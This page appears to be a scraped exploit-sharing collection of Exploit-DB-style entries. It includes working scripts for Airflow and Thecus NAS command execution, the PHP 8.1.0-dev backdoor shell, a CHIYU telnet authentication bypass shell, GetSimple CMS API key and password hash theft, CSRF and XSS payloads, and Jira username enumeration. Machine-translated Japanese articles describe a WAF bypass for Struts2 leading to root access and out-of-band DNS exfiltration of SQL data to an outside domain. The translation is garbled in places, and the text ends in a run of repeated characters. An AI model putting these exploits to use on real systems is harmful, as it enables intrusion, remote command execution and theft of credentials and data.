HireHackking

# Exploit Title: Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF) # Date: 2021-05-30 # Exploit Author: lated # Vendor Homepage: https://www.ubeeinteractive.com # Version: EVW327 <html> <body> <form action="http://192.168.0.1/goform/UbeeMgmtRemoteAccess" method="POST"> <input type="hidden" name="RemoteAccessEnable" value="1"/> <input type="hidden" name="RemoteAccessPort" value="8080"/> <input type="hidden" name="ApplyRemoteEnableAction" value="1"/> </form> <script> document.forms[0].submit(); </script> </body> </html>

# Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration) # Date: 31/05/2021 # Exploit Author: Mohammed Aloraimi # Vendor Homepage: https://www.atlassian.com/ # Software Link: https://www.atlassian.com/software/jira # Vulnerable versions: version 8.11.x to 8.15.0 # Tested on: Kali Linux # Proof Of Concept: ''' A username information disclosure vulnerability exists in Atlassian JIRA from versions 8.11.x to 8.15.x. Unauthenticated users can ENUMRATE valid users via /secure/QueryComponent!Jql.jspa endpoint. Tested versions: Atlassian JIRA 8.11.1 Atlassian JIRA 8.13 Atlassian JIRA 8.15 ''' #!/usr/bin/env python __author__ = "Mohammed Aloraimi (@ixSly)" import requests import sys import re import urllib3 urllib3.disable_warnings() def help(): print('python script.py <target> <username>') print('e.g. python script.py https://jiratarget.com admin') sys.exit() if len(sys.argv) < 3: help() def pwn(url,username): try: headers = {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"} data="jql=creator+in+({})&decorator=none".format(username) req = requests.post(url+"/secure/QueryComponent!Jql.jspa",headers=headers,verify=False,data=data) if "issue.field.project" in req.text and req.status_code == 200: print("[+] {} is a Valid User".format(username)) userFullName=re.search('value=\"user:{}\" title=\"(.+?)\"'.format(username),str(req.json()["values"]["creator"]).strip()) if userFullName: print("[+] User FullName: " + userFullName.group(1)) elif '["jqlTooComplex"]' in req.text and req.status_code == 401: print("[-] {} is not a Valid User".format(username)) else: print("[-] Error..") except Exception as e: print(str(e)) pass server = sys.argv[1] username = sys.argv[2] pwn(server,username)

# Exploit Title: CHIYU TCP/IP Converter devices - CRLF injection # Date: May 31 2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html # Software Link: https://www.chiyu-tech.com/category-hardware.html # Version: BF-430, BF-431, and BF-450M TCP/IP Converter devices - all firmware versions < June 2021 # Tested on: BF-430, BF-431, and BF-450M # Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks Description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter redirect= available on multiple CGI components. CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249 Affected parameter: redirect=Component: all the CGI components Payload: %0d%0a%0d%0a<script>alert(document.domain)</script> ====HTTP request====== GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1 Host: 192.168.187.12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.187.12/manage.htm Authorization: Basic OmFkbWlu Connection: close Upgrade-Insecure-Requests: 1 ======HTTP response======== HTTP/1.1 302 Found Location: setting.htm <script>alert(document.domain)</script> Content-Length: 0 Content-Type: text/html Steps to reproduce: 1. Navigate to the vulnerable device 2. Make a GET request to all CGI components 3. Append the payload at the end of the vulnerable parameter (redirect ) 4. Submit the request and observe payload execution Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.

# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution # Date: 2021-06-02 # Exploit Author: Pepe Berba # Vendor Homepage: https://airflow.apache.org/ # Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html # Version: <= 1.10.10 # Tested on: Docker apache/airflow:1.10 .10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml) # CVE : CVE-2020-11978 # # This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow # This combines with CVE-2020-13927 where unauthenticated requests to Airflow's Experimental API were allowded by default. # Together, potentially allows unauthenticated RCE to Airflow # # Repo: https://github.com/pberba/CVE-2020-11978 # More information can be found here: # https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E # https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E # # Remediation: # For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set. # For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete example_trigger_target_dag DAG. # # Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 "touch test" import argparse import requests import sys import time def create_dag(url, cmd): print('[+] Checking if Airflow Experimental REST API is accessible...') check = requests.get('{}/api/experimental/test'.format(url)) if check.status_code == 200: print('[+] /api/experimental/test returned 200' ) else: print('[!] /api/experimental/test returned {}'.format(check.status_code)) print('[!] Airflow Experimental REST API not be accessible') sys.exit(1) check_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url)) if check_task.status_code != 200: print('[!] Failed to find the example_trigger_target_dag.bash_task') print('[!] Host isn\'t vunerable to CVE-2020-11978') sys.exit(1) elif 'dag_run' in check_task.json()['env']: print('[!] example_trigger_target_dag.bash_task is patched') print('[!] Host isn\'t vunerable to CVE-2020-11978') sys.exit(1) print('[+] example_trigger_target_dag.bash_task is vulnerable') unpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url)) if unpause.status_code != 200: print('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded') sys.exit(1) else: print('[+] example_trigger_target_dag was enabled') print('[+] Creating new DAG...') res = requests.post( '{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url), json={ 'conf': { 'message': '"; {} #'.format(cmd) } } ) if res.status_code == 200: print('[+] Successfully created DAG') print('[+] "{}"'.format(res.json()['message'])) else: print('[!] Failed to create DAG') sys.exit(1) wait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format( url = url, execution_date=res.json()['execution_date'] ) start_time = time.time() print('[.] Waiting for the scheduler to run the DAG... This might take a minute.') print('[.] If the bash task is never queued, then the scheduler might not be running.') while True: time.sleep(10) res = requests.get(wait_url) status = res.json()['state'] if status == 'queued': print('[.] Bash task queued...') elif status == 'running': print('[+] Bash task running...') elif status == 'success': print('[+] Bash task successfully ran') break elif status == 'None': print('[-] Bash task is not yet queued...'.format(status)) else: print('[!] Bash task was {}'.format(status)) sys.exit(1) return 0 def main(): arg_parser = argparse.ArgumentParser() arg_parser.add_argument('url', type=str, help="Base URL for Airflow") arg_parser.add_argument('command', type=str) args = arg_parser.parse_args() create_dag( args.url, args.command ) if __name__ == '__main__': main()

# Exploit Title: Thecus N4800Eco Nas Server Control Panel - Comand Injection # Date: 01/06/2021 # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: http://www.thecus.com/ # Software Link: http://www.thecus.com/product.php?PROD_ID=83 # Version: N4800Eco # Description: https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection #!/usr/bin/python3 import requests import sys import urllib3 # To fix SSL error that occurs when the script is started. # 1- Open /etc/ssl/openssl.cnf file # At the bottom of the file: # [system_default_sect] # MinProtocol = TLSv1.2 # CipherString = DEFAULT@SECLEVEL=2 # 2- Set value of MinProtocol as TLSv1.0 def readResult(s, target): d = { "fun": "setlog", "action": "query", "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]' } url = "http://" + target + "/adm/setmain.php" resultReq = s.post(url, data=d, verify=False) dict = resultReq.text.split() print("[+] Reading system log...\n") print(dict[5:8]) #change this range to read whole output of the command def delUser(s, target, command): d = { "action": "delete", "username": "$("+command+")" } url = "http://" + target + "/adm/setmain.php?fun=setlocaluser" delUserReq = s.post(url, data=d, allow_redirects=False, verify=False) if 'Local User remove succeeds' in delUserReq.text: print('[+] %s command was executed successfully' % command) else: print('[-] %s command was not executed!' %command) sys.exit(1) readResult(s, target) def addUser(s, target, command): d = {'batch_content': '%24('+command+')%2C22222%2C9999'} url = "http://" + target + "/adm/setmain.php?fun=setbatch" addUserReq = s.post(url, data=d, allow_redirects=False, verify=False) if 'Users and groups were created successfully.' in addUserReq.text: print('[+] Users and groups were created successfully') else: print('[-] Users and groups were not created') sys.exit(1) delUser(s, target, command) def login(target, username, password, command=None): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) s = requests.Session() d = { "&eplang": "english", "p_pass": password, "p_user": username, "username": username, "pwd": password, "action": "login", "option": "com_extplorer" } url = "http://" + target + "/adm/login.php" loginReq = s.post(url, data=d, allow_redirects=False, verify=False) if '"success":true' in loginReq.text: print('[+] Authentication successful') elif '"success":false' in loginReq.text: print('[-] Authentication failed!') sys.exit(1) else: print('[-] Something went wrong!') sys.exit(1) addUser(s, target, command) def main(args): if len(args) != 5: print("usage: %s targetIp:port username password command" % (args[0])) print("Example 192.168.1.13:80 admin admin id") sys.exit(1) login(target=args[1], username=args[2], password=args[3], command=args[4]) if __name__ == "__main__": main(args=sys.argv)

# Exploit Title: Veyon 4.4.1 - 'VeyonService' Unquoted Service Path # Discovery by: Víctor García # Discovery Date: 2020-03-23 # Vendor Homepage: https://veyon.io/ # Software Link: https://github.com/veyon/veyon/releases/download/v4.4.1/veyon-4.4.1.0-win64-setup.exe # Tested Version: 4.4.1 # Vulnerability Type: Unquoted Service Path # Tested on: Windows 10 Pro x64 # CVE: CVE-2020-15261 # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ Veyon Service VeyonService C:\Program Files\Veyon\veyon-service.exe # Service info: C:\>sc qc VeyonService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: VeyonService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Veyon\veyon-service.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Veyon Service DEPENDENCIES : Tcpip : RpcSs SERVICE_START_NAME : LocalSystem # Exploit: # A successful attempt would require the local user to be able to insert their code in the # system root path undetected by the OS or other security applications where it could # potentially be executed during application startup or reboot. If successful, the local # user's code would execute with the elevated privileges of the application.

# Exploit Title: Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path # Date: 06-01-2021 # Exploit Author: Geovanni Ruiz # Vendor Homepage: https://www.intel.com # Software Version: 01.00.1080.0 # File Version: 1.00.1080.0 # Tested on: Microsoft® Windows 10 Home Single Language 10.0.19042 x64 es # Vulnerability Type: Unquoted Service Path # 1. To find the unquoted service path vulnerability C:\>wmic service where 'name like "%IntelAudioService%"' get name, displayname, pathname, startmode, startname DisplayName Name PathName StartMode StartName Intel(R) Audio Service IntelAudioService C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe Auto LocalSystem # 2. To check service info: C:\>sc qc "IntelAudioService" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: IntelAudioService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Intel(R) Audio Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # 3. Exploit: To exploit this vulnerability an attacker requires drop a malicious executable into the service path undetected by the OS in order to gain SYSTEM privileges.

# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure # Date 01.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: http://get-simple.info/ # Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip # Version: 3.3.4 # CVE: CVE-2014-8722 # Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit ''' Description: GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to (1) data/users/<username>.xml, (2) backups/users/<username>.xml.bak, (3) data/other/authorization.xml, or (4) data/other/appid.xml. ''' ''' Import required modules: ''' import sys import requests ''' User-Input: ''' target_ip = sys.argv[1] target_port = sys.argv[2] cmspath = sys.argv[3] print('') username = input("Do you know the username? Y/N: ") if username == 'Y': print('') username = True username_string = input('Please enter the username: ') else: print('') username = False print('No problem, you will still get the API key') ''' Get Api-Key: ''' url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml' header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Cache-Control": "max-age=0" } x = requests.get(url, headers=header).text start = x.find('[') + 7 end = x.find(']') api_key = x[start:end] print('') print('Informations:') print('') print('[*] API Key: ' + api_key) if username: ''' Get Email and Passwordhash: ''' url = "http://" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml' header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Cache-Control": "max-age=0" } x = requests.get(url, headers=header).text start = x[x.find('PWD>'):] passwordhash = start[start.find('>') +1 :start.find('<')] print('[*] Hashed Password: ' + passwordhash) start = x[x.find('EMAIL>'):] email = start[start.find('>') + 1 : start.find('<')] print('[*] Email: ' + email) print('')

# Exploit Title: Seo Panel 4.8.0 - 'from_time' Reflected XSS # Date: 23-03-2021 # Exploit Author: Piyush Patil # Vendor Homepage: https://www.seopanel.org/ # Version: Seo Panel 4.8.0 # Tested on: Windows 10 and Kali # CVE : CVE-2021-28420 -Description: A cross-site scripting (XSS) issue in Seo Panel 4.8.0 allows remote attackers to inject JavaScript via alerts.php and the "from_time" parameter. -Payload used: x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22 -Steps to reproduce: 1- Login to SEO admin panel 2- Visit: http://localhost/alerts.php?alert_category=general&from_time=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&keyword=&to_time=2021-03-11 3- Hover your mouse to "Period" field

# Exploit Title: Seo Panel 4.8.0 - 'search_name' Reflected XSS # Date: 21-03-2021 # Exploit Author: Piyush Patil # Vendor Homepage: https://www.seopanel.org/ # Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0 # Version: Seo Panel 4.8.0 # Tested on: Windows 10 and Kali # CVE : CVE-2021-28417 -Description: A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter. -Payload used: x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22 -Steps to reproduce: 1- Login to SEO admin panel 2- Add below line at the end: http://localhost/archive.php?from_time=2021-03-08&order_col=name&order_val=DESC&report_type=website-search-reports&search_name=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&sec=viewWebsiteSearchSummary&to_time=2021-03-09&website_id=http%3a%2f%2fwww.example.com 3- Hover your mouse near to "CTR" field

# Exploit Title: Products.PluggableAuthService 2.6.0 - Open Redirect # Exploit Author: Piyush Patil # Affected Component: Pluggable Zope authentication/authorization framework # Component Link: https://pypi.org/project/Products.PluggableAuthService/ # Version: < 2.6.1 # CVE: CVE-2021-21337 # Reference: https://github.com/zopefoundation/Products.PluggableAuthService/security/advisories/GHSA-p44j-xrqg-4xrr --------------------------Proof of Concept----------------------- 1- Goto https://localhost/login 2- Turn on intercept and click on the login 3- Change "came_from" parameter value to https://attacker.com 4- User will be redirected to an attacker-controlled website. Fix: pip install "Products.PluggableAuthService>=2.6.1"

# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution # Date: 23 may 2021 # Exploit Author: flast101 # Vendor Homepage: https://www.php.net/ # Software Link: # - https://hub.docker.com/r/phpdaily/php # - https://github.com/phpdaily/php # Version: 8.1.0-dev # Tested on: Ubuntu 20.04 # References: # - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a # - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md """ Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/ Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py Contact: flast101.sec@gmail.com An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header. The following exploit uses the backdoor to provide a pseudo shell ont the host. """ #!/usr/bin/env python3 import os import re import requests host = input("Enter the full host url:\n") request = requests.Session() response = request.get(host) if str(response) == '<Response [200]>': print("\nInteractive shell is opened on", host, "\nCan't acces tty; job crontol turned off.") try: while 1: cmd = input("$ ") headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "User-Agentt": "zerodiumsystem('" + cmd + "');" } response = request.get(host, headers = headers, allow_redirects = False) current_page = response.text stdout = current_page.split('<!DOCTYPE html>',1) text = print(stdout[0]) except KeyboardInterrupt: print("Exiting...") exit else: print("\r") print(response) print("Host is not available, aborting...") exit

この記事は、Apache Struts2 CVE-2013-2251に関するものです。これは、リモートコマンドの実行の影響のために非常に活用されている脆弱性です。要するに、「Action3:」/「Redirect:」/「Redirectaction:」を付けたパラメーターを操作することで導入される脆弱性により、フレームワークとしてStruts 2.3.15を使用してJava WebアプリケーションでリモートWebアプリケーションで実行できます。 現在、脆弱性がバイラリティに非常に広がるにつれて、主要なアプリケーションファイアウォールベンダーは、ルールエンジンと検出技術の更新を開始し、それが発生しないようにしています。しかし、著者は、ファイアウォールをバイパスしてリモートコードの実行を取得できるだけでなく、カーネルの脆弱性を活用することにより、ルートユーザーとしてサーバーの権限を取得する権限を高めることもできます。 著者が旅行予約のWebサイトをテストしているとき、アプリケーションが脆弱なApache Strutsフレームワークで実行されているかどうかを調べるために、「アクション、リダイレクト、リダイレクト」と正しい有効な攻撃負荷を確認するだけで、Googleを介してPOCを悪用しているブログ（OGNLの表現を構築する必要があります）を見つけてください。 http://blog.opensecurityResearch.com/2014/02/attacking-struts-with-cve-2013-2251.html、以下はコマンド「ifconfig」を実行するために使用されるペイロードです。 Redirect: $ {＃a=（new java.lang.processbuilder（new java.lang.string [] {'ifconfig'}）） java.io.bufferedreader（#c）、＃e=new char [50000]、＃d.read（＃e）、＃matt=＃context.get（ 'com.opensymphony.xwork2.dispatcher.httpservletresponse'）、＃matt.getwriter（）。 しかし、予想どおり、アプリケーションファイアウォールによってブロックされ、ボットマシンページにリダイレクトされます。 前述のように、著者にそのようなことが起こると、どのパラメーターが脆弱であるかを知っている場合、その1つは上記の要求で使用された「リダイレクト」パラメーターです。 「リダイレクト」、はい、あなたはそれが正しいと思います、ここでリダイレクトを試してみましょう、http://www.goal.comにリダイレクトするだけです ご覧のとおり、著者は302をリダイレクトしてhttp://www.goal.comにリダイレクトされたため、以前のifconfigコマンドペイロードがブロックされました。このリダイレクト方法により、著者はファイアウォールをバイパスするアイデアを提供するため、上記のペイロードを次のように変更します。 Redirect3:http://www.goal.com/$ {#a=（New Java.lang.ProcessBuilder（new Java.lang.String [] {'ifconfig'}）） java.io.bufferedreader（#c）、＃e=new char [50000]、＃d.read（＃e）、＃matt=＃context.get（ 'com.opensymphony.xwork2.dispatcher.httpservletresponse'）、＃matt.getwriter（）。 リクエストを開始します。 以下は、ファイアウォールをバイパスして実行を取得できる「ifconfig」コマンドの出力情報を示しています。 次の目標は、サーバーのリモートシェルを取得することです。著者は逆SSHトンネルと公開キー認証を使用してシェルを取得します。これにより、SSHユーザーはパスワードを入力せずにログインできます。したがって、著者は、攻撃者サーバーのSSH公開鍵を、被害者サーバー〜/.SSH/Authorized_Keysの認証パスに配置する必要があります。承認のアイデンティティを取得し、逆SSHトンネルとして取得するには、犠牲者SSHサーバーのID_RSA.PUB公開鍵も追加する必要があります。上記の2つのキーワードの概念を説明し、公開キーの認証の概念を理解するために----- ID_RSA.PUBは、他のホストに追加する公開キーであり、そのユーザーとしてログインできるようにします。 authorized_keysは、特定のサーバー上の特定のアカウントにログインすることを可能にするパブリックキーのリストです。 ステップ1- RCEを使用して、被害者サーバーのID_RSA.PUBファイルの場所を見つけます ステップ2-被害者サーバーから攻撃者サーバーにauthorized_keysをコピーする ステップ3-攻撃者のサーバーから変更されたauthorized_keysをコピーし、id_rsa.pubを読んでシェルを取得します。 最後のステップ-SSHは攻撃者のマシンで逆トンネリングを使用するため、次のコマンドラインが実行されました。 サーバーのリモートシェルを取得できますが、ルートとしてログインする許可はありません。つまり、ファイルとコマンド実行にアクセスする権利は限られています。これで、ルートとしてログインする許可を取得するために、著者は最初にカーネルバージョンが現在の犠牲者マシンで実行されているものをチェックします。 したがって、カーネルバージョンは2.6.32であることがわかります。使用されるCVEはGoogleを介して見つかります。このcve can アカウントの権利を取得し、脆弱性を活用するのは簡単です---- https：//github.com/realtalk/cve-2013-2094、そして最後にルートユーザー許可を取得します。 これは、Apache Strut 2の脆弱性とカーネルバージョンのエクスプロイトの組み合わせを活用することにより、ユーザーサーバーをルート化するリモートシェルを取得する方法です。

# Exploit Title: Seo Panel 4.8.0 - 'category' Reflected XSS # Date: 22-03-2021 # Exploit Author: Piyush Patil # Vendor Homepage: https://www.seopanel.org/ # Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0 # Version: Seo Panel 4.8.0 # Tested on: Windows 10 and Kali # CVE : CVE-2021-28418 -Description: A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter. -Payload used: x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22 -Steps to reproduce: 1- Login to SEO admin panel 2- Visit: http://localhost/settings.php?category=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22 3- Hover your mouse to "Cancel" field

# Exploit Title: CHIYU IoT Devices - 'Telnet' Authentication Bypass # Date: 01/06/2021 # Exploit Author: sirpedrotavares # Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html # Software Link: https://www.chiyu-tech.com/category-hardware.html # Version: BF-430, BF-431, BF-450M, and SEMAC - all firmware versions < June 2021 # Tested on: BF-430, BF-431, BF-450M, and SEMAC # CVE: CVE-2021-31251 # Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks """ Description: Several IoT devices from the CHIYU Technology firm are vulnerable to a flaw that permits bypassing the telnet authentication process due to an overflow during the negotiation of the telnet protocol. Telnet authentication is bypassed by supplying a specially malformed request, and an attacker may force the remote telnet server to believe that the user has already authenticated. Several models are vulnerable, including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware versions. CVE ID: CVE-2021-31251 CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251 """ #!/usr/bin/env python3 # usage: python3 exploit.py IP import socket import time import sys HOST = sys.argv[1] PORT = 23 socket.setdefaulttimeout(10) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect = s.connect_ex((HOST, PORT)) try: print("[+] Try to connect...\n") time.sleep(1) s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18") s.recv(1024).strip() s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18") s.recv(1024).strip() s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18") result = s.recv(1024).strip() if result != b'\xff\xfe\x01': s.send(b"\x09") result = s.recv(1024).strip() if connect == 0 and "sername" not in str(result): if b"\xff\xfe\x01" == result: print("Connected! ;)\ntype: \"help\"\n\n") while 1: cmd = input("(CHIYU pwnShell:) $ ") body = cmd+"\n" s.send(body.encode('utf-8', 'ignore')) result = s.recv(1024).decode('utf8', 'ignore') if not len(result): print("[+] CHIYU device not available, try again ... (terminating)") s.close() break print(result.strip('CMD>')) b = "\n" s.send(b.encode('utf-8', 'ignore')) result = s.recv(1024).decode() print(result.strip('CMD>')) except KeyboardInterrupt: print("\n[+] ^C Received, closing connection") s.close() except EOFError: print("\n[+] ^D Received, closing connection") s.close() except socket.error: print("[+] Unable to connect to CHIYU device.")

# Exploit Title: FUDForum 3.1.0 - 'srch' Reflected XSS # Exploit Author: Piyush Patil # Vendor Homepage: http://fudforum.org/ # Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.1.0.zip/download # Version: FUDForum 3.1.0 # Tested on: Windows 10 and Kali # CVE : CVE-2021-27519 -Description: A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the "srch" parameter. -Payload used: x" onmouseover=alert(1) x=" -Steps to reproduce: 1- goto https://localhost/fudforum/index.php?t=search& 2- In "forum search" option, paste XSS payload 3- Hover your mouse to "x" and XSS will get triggered

0x00原因 実際の場合、注射に遭遇しました。 SQLMAPを使用できますが、時間と周波数の制限に基づく注入には、-delayパラメーターの使用が必要です。それは遅延であり、 - 遅延とその他の疲労です。以下のすべての紹介で、SQLMAPを使用してDNSを使用してOOB（バンド）を注入してデータを迅速に出力します。通常、Windows Platform にのみ適用されます 0x01シーン このような注入シナリオに遭遇しましたか？ 1.時間の失明、データベース、テーブル、フィールドのコンテンツは非常に大きく、花も薄れています。 2。MySQL5.6+はMySQLIまたはPDO接続法のみを使用でき、PDO接続を使用することをお勧めします。 PDO接続法を使用して複数のステートメントを実行できますが、PDOは最初のSQLステートメントの実行結果のみを返すため、データを直接取得することは一般に不可能であり、目に見えるフィールドまたは睡眠注入を強制されます3。テストはインターセプトしてフィルタリングされず、実行が成功したと感じましたが、返されたデータは受信されませんでした（コマンドを実行できるときにファイルをWebディレクトリに書き込むこともできます） 0x02原則 UNCパスを使用して、指定されたドメイン名を照会します。 DNSチャネルを使用して、DNSサーバーが受信したデータを使用してデータコンテンツをすばやく取得します。 DNSの使用には、ホストネットワークの分離を突破できる特定の利点があります。たとえば、DMZホストは外部ネットワークに直接接続することはできませんが、構成されたネットワークで到達できるDNSサーバーを使用することがよくあります。ドメイン名を再帰的に照会することにより、DNSサーバーはDNSプロトコルを介して返されたデータを取り出すことができます。 UNCパスはWindowsの下の機能であり、そのような関数はデフォルトでインストールされているLinuxの下には存在しません。 フローチャートは次のとおりです。 MySQLはPDOを使用してデータベースブラインドアノテーションをリンクして、成功したかどうかを判断します（通常の注入も参照できます） select load_file（concat（ '//'、（select 2333）、 '。mysql.panokaz.exeye.io/abc'））; select hex（ 'select load_file（concat（' //'、（select 2333）、'。mysql.panokaz.exeye.io/abc '）;'） セット@x=0x53454C454354204C4F41445F46494C4528434F4E43415428272F272C28553454C4543542027 7465737427292C272E6D7973716C2E70616E6F6B617A2E65786579652E696F2F6162632729293B; @x; execute aからaを準備します。 MySQLの使用シナリオ：国内のDNS再帰を捕まえた上位レベルのDNSサーバーは、360、Tencent、およびALIでした。このようなノードDNSサーバーがあれば、間違いなく恥ずかしがり屋のウェブサイトをたくさん手に入れるでしょう。私はそれについて考えることに少し興奮していました▽≤sqlServerは次の方法を使用できます @s varchar（5000）、 @host varchar（5000）set @s=（host_name（））set @host=convert（varchar（5000）、 @s）+'sqlserver.panokaz.exeye.io'; exec（ 'master.xp_dirtree' \\ '+ @host+' \ foobar $ '' '）） SQLServerのシナリオを使用： 0x03手動テストで遭遇した問題とソリューション DNSキャッシュがあるため、ドメイン名を要求した後、DNSレコードがローカルマシンで生成され、再帰的に外側にクエリされることはありません。したがって、UNCパスのDNSドメイン名は同じではありません。 UNCパスの長さは長すぎることはありません。から始まる識別子'\\aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 